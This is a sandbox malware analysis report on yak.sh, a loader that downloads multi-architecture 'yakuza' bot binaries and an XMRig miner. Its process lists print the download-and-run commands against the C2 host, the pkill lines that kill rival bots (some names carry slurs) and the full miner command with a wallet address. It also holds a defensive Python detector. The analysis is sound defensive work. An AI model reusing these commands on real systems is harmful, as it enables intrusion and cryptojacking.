Malware Analysis Report

2025-01-02 07:01

Sample ID 241124-aamklszlcn
Target yak.sh
SHA256 ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf
Tags
defense_evasion discovery antivm xmrig xmrig_linux miner
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral1 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral2 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral3 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral4 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
10/10

SHA256

ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf

Threat Level: Known bad

The file yak.sh was found to be: Known bad.

Malicious Activity Summary

Tags: defense_evasion discovery antivm xmrig xmrig_linux miner

Family: xmrig (Xmrig family, Xmrig_linux family)

Signatures hit:
XMRig Miner payload
Executes dropped EXE
File and Directory Permissions Modification
Enumerates running processes
Checks CPU configuration
Reads CPU attributes
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-24 00:00

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-24 00:00

Reported

2024-11-24 00:03

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

148s

Max time network

132s

Command Line

[/tmp/yak.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
13 rows, each: N/A N/A /bin/chmod N/A (one hit per `chmod +x` in the process list below)

System Network Configuration Discovery

discovery
Description Indicator Process Target
6 rows with no description, indicator or target recorded; processes, in order: /tmp/yakuza.mips, /bin/rm, /usr/bin/wget, /tmp/yakuza.mipsel, /bin/rm, /usr/bin/wget

Processes

/tmp/yak.sh

[/tmp/yak.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mips]

/bin/chmod

[chmod +x yakuza.mips]

/tmp/yakuza.mips

[./yakuza.mips]

/bin/rm

[rm -rf yakuza.mips]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mipsel]

/bin/chmod

[chmod +x yakuza.mipsel]

/tmp/yakuza.mipsel

[./yakuza.mipsel]

/bin/rm

[rm -rf yakuza.mipsel]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sh]

/bin/chmod

[chmod +x yakuza.sh]

/tmp/yakuza.sh

[./yakuza.sh]

/bin/rm

[rm -rf yakuza.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.x86]

/bin/chmod

[chmod +x yakuza.x86]

/tmp/yakuza.x86

[./yakuza.x86]

/bin/rm

[rm -rf yakuza.x86]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm6]

/bin/chmod

[chmod +x yakuza.arm6]

/tmp/yakuza.arm6

[./yakuza.arm6]

/bin/rm

[rm -rf yakuza.arm6]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i686]

/bin/chmod

[chmod +x yakuza.i686]

/tmp/yakuza.i686

[./yakuza.i686]

/bin/rm

[rm -rf yakuza.i686]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.ppc]

/bin/chmod

[chmod +x yakuza.ppc]

/tmp/yakuza.ppc

[./yakuza.ppc]

/bin/rm

[rm -rf yakuza.ppc]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i586]

/bin/chmod

[chmod +x yakuza.i586]

/tmp/yakuza.i586

[./yakuza.i586]

/bin/rm

[rm -rf yakuza.i586]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.m68k]

/bin/chmod

[chmod +x yakuza.m68k]

/tmp/yakuza.m68k

[./yakuza.m68k]

/bin/rm

[rm -rf yakuza.m68k]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm4]

/bin/chmod

[chmod +x yakuza.arm4]

/tmp/yakuza.arm4

[./yakuza.arm4]

/bin/rm

[rm -rf yakuza.arm4]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm5]

/bin/chmod

[chmod +x yakuza.arm5]

/tmp/yakuza.arm5

[./yakuza.arm5]

/bin/rm

[rm -rf yakuza.arm5]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm7]

/bin/chmod

[chmod +x yakuza.arm7]

/tmp/yakuza.arm7

[./yakuza.arm7]

/bin/rm

[rm -rf yakuza.arm7]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sparc]

/bin/chmod

[chmod +x yakuza.sparc]

/tmp/yakuza.sparc

[./yakuza.sparc]

/bin/rm

[rm -rf yakuza.sparc]

/bin/bash

[bash]

/usr/bin/curl

[curl -s http://linux-it.abuser.eu/test.php]
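The process list above is the loader's whole procedure: for each architecture suffix it fetches http://linux-it.abuser.eu/yakuza.<arch> with wget, marks the file executable, runs it, deletes it, and after the last variant drops into bash and fetches test.php with curl. The block below is an added example, not code from the report or from the sample: detection logic for that shape, run over a constructed trace made of command lines copied from the process list. It keys on the ordered fetch, chmod, exec, rm chain per filename, and on the same payload stem being sprayed at several architectures from one host. The function names, the chain-state rules and the min_variants threshold are the editor's assumptions; in production the TRACE list would be replaced by execve events from auditd or an eBPF exec tracer.

```python
"""
Added example (not part of the sandbox report): detect the multi-architecture
"fetch -> chmod +x -> execute -> rm -rf" drop loop. TRACE holds command lines
copied from the report; the detector, its names and its threshold are assumptions.
"""
import re
import shlex
from collections import Counter
from urllib.parse import urlparse

# Constructed trace: a subset of the recorded command lines, in execution order.
TRACE = [
    "/tmp/yak.sh",
    "wget http://linux-it.abuser.eu/yakuza.mips",
    "chmod +x yakuza.mips",
    "./yakuza.mips",
    "rm -rf yakuza.mips",
    "wget http://linux-it.abuser.eu/yakuza.mipsel",
    "chmod +x yakuza.mipsel",
    "./yakuza.mipsel",
    "rm -rf yakuza.mipsel",
    "wget http://linux-it.abuser.eu/yakuza.x86",
    "chmod +x yakuza.x86",
    "./yakuza.x86",
    "rm -rf yakuza.x86",
    "bash",
    "curl -s http://linux-it.abuser.eu/test.php",
]

FETCHERS = {"wget", "curl"}
URL_RE = re.compile(r"^(https?|ftp)://")


def _argv(cmdline):
    """Tokenise a command line; fall back to whitespace split on unbalanced quotes."""
    try:
        return shlex.split(cmdline)
    except ValueError:
        return cmdline.split()


def _basename(path):
    return path.rsplit("/", 1)[-1]


def find_drop_chains(trace):
    """Return one record per completed fetch -> chmod -> exec -> rm chain.

    A chain opens when wget/curl is given an http(s)/ftp URL and advances only in
    order: the downloaded basename must be chmod'ed, then executed as ./name or
    /tmp/name, then removed. Anything out of order leaves the chain incomplete.
    """
    chains = []
    pending = {}  # basename -> {"url", "host", "steps"}
    for line in trace:
        argv = _argv(line)
        if not argv:
            continue
        cmd = _basename(argv[0])
        if cmd in FETCHERS:
            for url in (a for a in argv[1:] if URL_RE.match(a)):
                name = _basename(urlparse(url).path)
                if name:
                    pending[name] = {"url": url, "host": urlparse(url).hostname, "steps": ["fetch"]}
        elif cmd == "chmod":
            for target in argv[2:]:
                state = pending.get(_basename(target))
                if state and state["steps"] == ["fetch"]:
                    state["steps"].append("chmod")
        elif cmd == "rm":
            for target in (a for a in argv[1:] if not a.startswith("-")):
                state = pending.pop(_basename(target), None)
                if state and state["steps"] == ["fetch", "chmod", "exec"]:
                    state["steps"].append("rm")
                    chains.append(state)
        elif argv[0].startswith(("./", "/tmp/")):
            state = pending.get(cmd)
            if state and state["steps"] == ["fetch", "chmod"]:
                state["steps"].append("exec")
    return chains


def spray_alerts(chains, min_variants=3):
    """Flag one payload stem fetched in >= min_variants arch-suffixed variants from one host."""
    counts = Counter()
    for c in chains:
        stem = _basename(urlparse(c["url"]).path).rsplit(".", 1)[0]
        counts[(c["host"], stem)] += 1
    return [
        {"host": host, "payload": stem, "variants": n}
        for (host, stem), n in sorted(counts.items())
        if n >= min_variants
    ]


if __name__ == "__main__":
    found = find_drop_chains(TRACE)
    for c in found:
        print(c["url"], "->", " > ".join(c["steps"]))
    print(spray_alerts(found))
```

The chain is completed by the `rm`, not by the `exec`: in this run every variant was executed whether or not it could run on the sandbox CPU, so an exec event alone says nothing, while fetch-chmod-exec-rm of the same name in that order is the loader's signature. The test.php fetch opens a chain that never completes and is ignored.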

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 151.101.193.91:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.7:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 84.17.50.8:443 1527653184.rsc.cdn77.org tcp

Note: linux-it.abuser.eu is looked up twice, but no session on port 80 (what the http:// wget and curl fetches would use) appears, none of the TCP sessions is to that domain, and no dropped files are listed below. The domain, not the IPs in this table, is the indicator from this run.

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-24 00:00

Reported

2024-11-24 00:03

Platform

debian9-armhf-20240729-en

Max time kernel

149s

Max time network

7s

Command Line

[/tmp/yak.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
13 rows, each: N/A N/A /bin/chmod N/A (one hit per `chmod +x` in the process list below)

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Note: the process behind both hits is the sandbox's own /usr/bin/curl, not the sample. Reading /proc/cpuinfo and /proc/self/auxv (CPU feature detection) and /proc/sys/crypto/fips_enabled (FIPS mode check) is normal start-up behaviour for curl's crypto library on ARM, so the antivm tag carries no weight on its own.

System Network Configuration Discovery

discovery
Description Indicator Process Target
6 rows with no description, indicator or target recorded; processes, in order: /bin/rm, /usr/bin/wget, /tmp/yakuza.mipsel, /bin/rm, /usr/bin/wget, /tmp/yakuza.mips

Processes

/tmp/yak.sh

[/tmp/yak.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mips]

/bin/chmod

[chmod +x yakuza.mips]

/tmp/yakuza.mips

[./yakuza.mips]

/bin/rm

[rm -rf yakuza.mips]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mipsel]

/bin/chmod

[chmod +x yakuza.mipsel]

/tmp/yakuza.mipsel

[./yakuza.mipsel]

/bin/rm

[rm -rf yakuza.mipsel]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sh]

/bin/chmod

[chmod +x yakuza.sh]

/tmp/yakuza.sh

[./yakuza.sh]

/bin/rm

[rm -rf yakuza.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.x86]

/bin/chmod

[chmod +x yakuza.x86]

/tmp/yakuza.x86

[./yakuza.x86]

/bin/rm

[rm -rf yakuza.x86]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm6]

/bin/chmod

[chmod +x yakuza.arm6]

/tmp/yakuza.arm6

[./yakuza.arm6]

/bin/rm

[rm -rf yakuza.arm6]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i686]

/bin/chmod

[chmod +x yakuza.i686]

/tmp/yakuza.i686

[./yakuza.i686]

/bin/rm

[rm -rf yakuza.i686]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.ppc]

/bin/chmod

[chmod +x yakuza.ppc]

/tmp/yakuza.ppc

[./yakuza.ppc]

/bin/rm

[rm -rf yakuza.ppc]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i586]

/bin/chmod

[chmod +x yakuza.i586]

/tmp/yakuza.i586

[./yakuza.i586]

/bin/rm

[rm -rf yakuza.i586]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.m68k]

/bin/chmod

[chmod +x yakuza.m68k]

/tmp/yakuza.m68k

[./yakuza.m68k]

/bin/rm

[rm -rf yakuza.m68k]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm4]

/bin/chmod

[chmod +x yakuza.arm4]

/tmp/yakuza.arm4

[./yakuza.arm4]

/bin/rm

[rm -rf yakuza.arm4]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm5]

/bin/chmod

[chmod +x yakuza.arm5]

/tmp/yakuza.arm5

[./yakuza.arm5]

/bin/rm

[rm -rf yakuza.arm5]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm7]

/bin/chmod

[chmod +x yakuza.arm7]

/tmp/yakuza.arm7

[./yakuza.arm7]

/bin/rm

[rm -rf yakuza.arm7]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sparc]

/bin/chmod

[chmod +x yakuza.sparc]

/tmp/yakuza.sparc

[./yakuza.sparc]

/bin/rm

[rm -rf yakuza.sparc]

/usr/bin/curl

[curl -s http://linux-it.abuser.eu/test.php]

/bin/bash

[bash]

Network

Country Destination Domain Proto
US 1.1.1.1:53 linux-it.abuser.eu udp (14 identical rows)

Note: 14 DNS lookups of the C2 domain and no TCP session at all (max time network 7s), consistent with none of the fetches completing on this platform.

Files

memory/713-1-0xb673e000-0xb674f044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-24 00:00

Reported

2024-11-24 00:03

Platform

debian9-mipsbe-20240611-en

Max time kernel

149s

Max time network

151s

Command Line

[/tmp/yak.sh]

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
2 rows with no description, indicator, process or target recorded

Xmrig family
xmrig

Xmrig_linux family
xmrig_linux

Tags: xmrig, miner, xmrig_linux

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
14 rows, each: N/A N/A /bin/chmod N/A (13 `chmod +x yakuza.*` plus `chmod +x xmrig` in the process list below)

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/yakuza.mips /tmp/yakuza.mips N/A
N/A /tmp/xmrig /tmp/xmrig N/A

Note: of the thirteen yakuza.* variants only the MIPS big-endian one executed, which matches this sandbox platform. In the process list below, /tmp/xmrig is immediately followed by "/bin/sh ./xmrig --url ...": that is the execvp(3) fallback, which re-runs a file as "/bin/sh <file> <args>" when execve fails with ENOEXEC (here, a binary built for another architecture). The shell then parses ELF bytes as script text, and the garbled /tmp/ filename created by /bin/sh in the "Writes file to tmp directory" table is consistent with a redirect in that garbage. The miner command line remains a reliable indicator even though the miner is unlikely to have run in this detonation.

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A (63 rows)
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A (1 row)

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/<pid>/status or /proc/<pid>/cmdline /usr/bin/pkill N/A (63 rows)
File opened for reading /proc/3/cmdline /bin/ps N/A (1 row)
PIDs touched across the 64 rows: 3, 5, 6, 7, 8, 10, 11, 12, 14, 15, 16, 17, 19, 20, 21, 36, 37, 70, 71, 73, 74, 75, 82, 111, 121, 150, 154, 171, 223, 324, 356, 357, 374, 381, 384, 664, 665, 686, 691, 692, 693, 725, 727, 799

System Network Configuration Discovery

discovery
Description Indicator Process Target
9 rows with no description, indicator or target recorded; processes, in order: /tmp/yakuza.mipsel, /bin/rm, /bin/busybox, /bin/sh, /usr/bin/pkill, /usr/bin/wget, /tmp/yakuza.mips, /bin/rm, /usr/bin/wget

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/yakuza.sh /usr/bin/wget N/A
File opened for modification /tmp/yakuza.x86 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm7 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.mips /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm6 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.i586 /usr/bin/wget N/A
File opened for modification /tmp/xmrig /usr/bin/curl N/A
File opened for modification /tmp/yakuza.mipsel /usr/bin/wget N/A
File opened for modification /tmp/yakuza.i686 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm5 /usr/bin/wget N/A
File opened for modification /tmp/S�@@p�~@8 /bin/sh N/A
File opened for modification /tmp/yakuza.ppc /usr/bin/wget N/A
File opened for modification /tmp/yakuza.m68k /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm4 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.sparc /usr/bin/wget N/A

Processes

/tmp/yak.sh

[/tmp/yak.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mips]

/bin/chmod

[chmod +x yakuza.mips]

/tmp/yakuza.mips

[./yakuza.mips]

/bin/sh

[sh -c pkill -9 902i13 || busybox pkill -9 902i13]

/bin/rm

[rm -rf yakuza.mips]

/usr/bin/pkill

[pkill -9 902i13]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mipsel]

/bin/busybox

[busybox pkill -9 902i13]

/bin/sh

[sh -c pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY]

/usr/bin/pkill

[pkill -9 BzSxLxBxeY]

/bin/busybox

[busybox pkill -9 BzSxLxBxeY]

/bin/chmod

[chmod +x yakuza.mipsel]

/tmp/yakuza.mipsel

[./yakuza.mipsel]

/bin/sh

[sh -c pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7]

/usr/bin/pkill

[pkill -9 HOHO-LUGO7]

/bin/rm

[rm -rf yakuza.mipsel]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sh]

/bin/busybox

[busybox pkill -9 HOHO-LUGO7]

/bin/sh

[sh -c pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL]

/usr/bin/pkill

[pkill -9 HOHO-U79OL]

/bin/busybox

[busybox pkill -9 HOHO-U79OL]

/bin/sh

[sh -c pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87]

/usr/bin/pkill

[pkill -9 JuYfouyf87]

/bin/chmod

[chmod +x yakuza.sh]

/bin/busybox

[busybox pkill -9 JuYfouyf87]

/tmp/yakuza.sh

[./yakuza.sh]

/bin/rm

[rm -rf yakuza.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.x86]

/bin/sh

[sh -c pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd]

/usr/bin/pkill

[pkill -9 NiGGeR69xd]

/bin/busybox

[busybox pkill -9 NiGGeR69xd]

/bin/sh

[sh -c pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X]

/usr/bin/pkill

[pkill -9 SO190Ij1X]

/bin/chmod

[chmod +x yakuza.x86]

/bin/busybox

[busybox pkill -9 SO190Ij1X]

/tmp/yakuza.x86

[./yakuza.x86]

/bin/rm

[rm -rf yakuza.x86]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm6]

/bin/sh

[sh -c pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE]

/usr/bin/pkill

[pkill -9 LOLKIKEEEDDE]

/bin/busybox

[busybox pkill -9 LOLKIKEEEDDE]

/bin/sh

[sh -c pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e]

/usr/bin/pkill

[pkill -9 ekjheory98e]

/bin/chmod

[chmod +x yakuza.arm6]

/tmp/yakuza.arm6

[./yakuza.arm6]

/bin/busybox

[busybox pkill -9 ekjheory98e]

/bin/rm

[rm -rf yakuza.arm6]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i686]

/bin/sh

[sh -c pkill -9 scansh4 || busybox pkill -9 scansh4]

/usr/bin/pkill

[pkill -9 scansh4]

/bin/busybox

[busybox pkill -9 scansh4]

/bin/chmod

[chmod +x yakuza.i686]

/tmp/yakuza.i686

[./yakuza.i686]

/bin/sh

[sh -c pkill -9 MDMA || busybox pkill -9 MDMA]

/usr/bin/pkill

[pkill -9 MDMA]

/bin/rm

[rm -rf yakuza.i686]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.ppc]

/bin/busybox

[busybox pkill -9 MDMA]

/bin/sh

[sh -c pkill -9 fdevalvex || busybox pkill -9 fdevalvex]

/usr/bin/pkill

[pkill -9 fdevalvex]

/bin/busybox

[busybox pkill -9 fdevalvex]

/bin/chmod

[chmod +x yakuza.ppc]

/tmp/yakuza.ppc

[./yakuza.ppc]

/bin/rm

[rm -rf yakuza.ppc]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i586]

/bin/sh

[sh -c pkill -9 scanspc || busybox pkill -9 scanspc]

/usr/bin/pkill

[pkill -9 scanspc]

/bin/busybox

[busybox pkill -9 scanspc]

/bin/sh

[sh -c pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ]

/usr/bin/pkill

[pkill -9 MELTEDNINJAREALZ]

/bin/busybox

[busybox pkill -9 MELTEDNINJAREALZ]

/bin/chmod

[chmod +x yakuza.i586]

/tmp/yakuza.i586

[./yakuza.i586]

/bin/rm

[rm -rf yakuza.i586]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.m68k]

/bin/sh

[sh -c pkill -9 flexsonskids || busybox pkill -9 flexsonskids]

/usr/bin/pkill

[pkill -9 flexsonskids]

/bin/busybox

[busybox pkill -9 flexsonskids]

/bin/sh

[sh -c pkill -9 scanx86 || busybox pkill -9 scanx86]

/usr/bin/pkill

[pkill -9 scanx86]

/bin/busybox

[busybox pkill -9 scanx86]

/bin/chmod

[chmod +x yakuza.m68k]

/tmp/yakuza.m68k

[./yakuza.m68k]

/bin/rm

[rm -rf yakuza.m68k]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm4]

/bin/sh

[sh -c pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL]

/usr/bin/pkill

[pkill -9 MISAKI-U79OL]

/bin/busybox

[busybox pkill -9 MISAKI-U79OL]

/bin/sh

[sh -c pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe]

/usr/bin/pkill

[pkill -9 foAxi102kxe]

/bin/busybox

[busybox pkill -9 foAxi102kxe]

/bin/sh

[sh -c pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj]

/usr/bin/pkill

[pkill -9 swodjwodjwoj]

/bin/busybox

[busybox pkill -9 swodjwodjwoj]

/bin/sh

[sh -c pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l]

/usr/bin/pkill

[pkill -9 MmKiy7f87l]

/bin/busybox

[busybox pkill -9 MmKiy7f87l]

/bin/chmod

[chmod +x yakuza.arm4]

/tmp/yakuza.arm4

[./yakuza.arm4]

/bin/rm

[rm -rf yakuza.arm4]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm5]

/bin/sh

[sh -c pkill -9 freecookiex86 || busybox pkill -9 freecookiex86]

/usr/bin/pkill

[pkill -9 freecookiex86]

/bin/busybox

[busybox pkill -9 freecookiex86]

/bin/chmod

[chmod +x yakuza.arm5]

/tmp/yakuza.arm5

[./yakuza.arm5]

/bin/rm

[rm -rf yakuza.arm5]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm7]

/bin/sh

[sh -c pkill -9 sysgpu || busybox pkill -9 sysgpu]

/usr/bin/pkill

[pkill -9 sysgpu]

/bin/busybox

[busybox pkill -9 sysgpu]

/bin/sh

[sh -c pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd]

/usr/bin/pkill

[pkill -9 NiGGeR69xd]

/bin/busybox

[busybox pkill -9 NiGGeR69xd]

/bin/chmod

[chmod +x yakuza.arm7]

/tmp/yakuza.arm7

[./yakuza.arm7]

/bin/rm

[rm -rf yakuza.arm7]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sparc]

/bin/sh

[sh -c pkill -9 frgege || busybox pkill -9 frgege]

/usr/bin/pkill

[pkill -9 frgege]

/bin/busybox

[busybox pkill -9 frgege]

/bin/chmod

[chmod +x yakuza.sparc]

/tmp/yakuza.sparc

[./yakuza.sparc]

/bin/rm

[rm -rf yakuza.sparc]

/bin/bash

[bash]

/usr/bin/curl

[curl -s http://linux-it.abuser.eu/test.php]

/bin/sh

[sh -c pkill -9 sysupdater || busybox pkill -9 sysupdater]

/usr/bin/pkill

[pkill -9 sysupdater]

/bin/busybox

[busybox pkill -9 sysupdater]

/bin/grep

[grep xmrig]

/bin/grep

[grep -v grep]

/bin/ps

[ps x]

/bin/grep

[grep 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW]

/bin/sh

[sh -c pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd]

/usr/bin/pkill

[pkill -9 0DnAzepd]

/bin/busybox

[busybox pkill -9 0DnAzepd]

/usr/bin/curl

[curl -O ftp://linux-it.abuser.eu/xmrig-lnx/xmrig]

/bin/sh

[sh -c pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69]

/usr/bin/pkill

[pkill -9 NiGGeRD0nks69]

/bin/busybox

[busybox pkill -9 NiGGeRD0nks69]

/bin/sh

[sh -c pkill -9 frgreu || busybox pkill -9 frgreu]

/usr/bin/pkill

[pkill -9 frgreu]

/bin/busybox

[busybox pkill -9 frgreu]

/bin/sh

[sh -c pkill -9 telnetd || busybox pkill -9 telnetd]

/usr/bin/pkill

[pkill -9 telnetd]

/bin/busybox

[busybox pkill -9 telnetd]

/bin/sh

[sh -c pkill -9 0x766f6964 || busybox pkill -9 0x766f6964]

/usr/bin/pkill

[pkill -9 0x766f6964]

/bin/busybox

[busybox pkill -9 0x766f6964]

/bin/sh

[sh -c pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337]

/usr/bin/pkill

[pkill -9 NiGGeRd0nks1337]

/bin/busybox

[busybox pkill -9 NiGGeRd0nks1337]

/bin/sh

[sh -c pkill -9 gaft || busybox pkill -9 gaft]

/usr/bin/pkill

[pkill -9 gaft]

/bin/busybox

[busybox pkill -9 gaft]

/bin/sh

[sh -c pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa]

/usr/bin/pkill

[pkill -9 urasgbsigboa]

/bin/busybox

[busybox pkill -9 urasgbsigboa]

/bin/sh

[sh -c pkill -9 120i3UI49 || busybox pkill -9 120i3UI49]

/usr/bin/pkill

[pkill -9 120i3UI49]

/bin/busybox

[busybox pkill -9 120i3UI49]

/bin/sh

[sh -c pkill -9 OaF3 || busybox pkill -9 OaF3]

/usr/bin/pkill

[pkill -9 OaF3]

/bin/busybox

[busybox pkill -9 OaF3]

/bin/sh

[sh -c pkill -9 geae || busybox pkill -9 geae]

/usr/bin/pkill

[pkill -9 geae]

/bin/chmod

[chmod +x xmrig]

/bin/busybox

[busybox pkill -9 geae]

/usr/bin/nohup

[nohup ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker819 --tls --cpu-priority=3 --asm=auto]

/tmp/xmrig

[./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker819 --tls --cpu-priority=3 --asm=auto]

/bin/sh

[/bin/sh ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker819 --tls --cpu-priority=3 --asm=auto]

/bin/sh

[sh -c pkill -9 vaiolmao || busybox pkill -9 vaiolmao]

/usr/bin/pkill

[pkill -9 vaiolmao]

/bin/busybox

[busybox pkill -9 vaiolmao]

/bin/sh

[sh -c pkill -9 123123a || busybox pkill -9 123123a]

/usr/bin/pkill

[pkill -9 123123a]

/bin/busybox

[busybox pkill -9 123123a]

/bin/sh

[sh -c pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D]

/usr/bin/pkill

[pkill -9 Ofurain0n4H34D]

/bin/busybox

[busybox pkill -9 Ofurain0n4H34D]

/bin/sh

[sh -c pkill -9 ggTrex || busybox pkill -9 ggTrex]

/usr/bin/pkill

[pkill -9 ggTrex]

/bin/busybox

[busybox pkill -9 ggTrex]

/bin/sh

[sh -c pkill -9 wasads || busybox pkill -9 wasads]

/usr/bin/pkill

[pkill -9 wasads]

/bin/busybox

[busybox pkill -9 wasads]

/bin/sh

[sh -c pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD]

/usr/bin/pkill

[pkill -9 1293194hjXD]

/bin/busybox

[busybox pkill -9 1293194hjXD]

/bin/sh

[sh -c pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn]

/usr/bin/pkill

[pkill -9 OthLaLosn]

/bin/busybox

[busybox pkill -9 OthLaLosn]

/bin/sh

[sh -c pkill -9 ggt || busybox pkill -9 ggt]

/usr/bin/pkill

[pkill -9 ggt]

/bin/busybox

[busybox pkill -9 ggt]

/bin/sh

[sh -c pkill -9 wget-log || busybox pkill -9 wget-log]

/usr/bin/pkill

[pkill -9 wget-log]

/bin/busybox

[busybox pkill -9 wget-log]

/bin/sh

[sh -c pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER]

/usr/bin/pkill

[pkill -9 1337SoraLOADER]

/bin/busybox

